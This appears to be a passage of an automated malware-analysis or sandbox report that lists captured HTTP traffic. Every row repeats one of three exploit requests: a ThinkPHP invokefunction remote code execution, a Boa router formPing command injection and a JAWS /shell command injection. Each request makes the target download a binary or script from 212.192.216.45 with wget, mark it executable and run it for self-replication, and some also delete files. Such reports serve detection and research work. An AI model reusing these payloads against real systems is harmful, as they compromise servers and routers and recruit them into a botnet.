| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
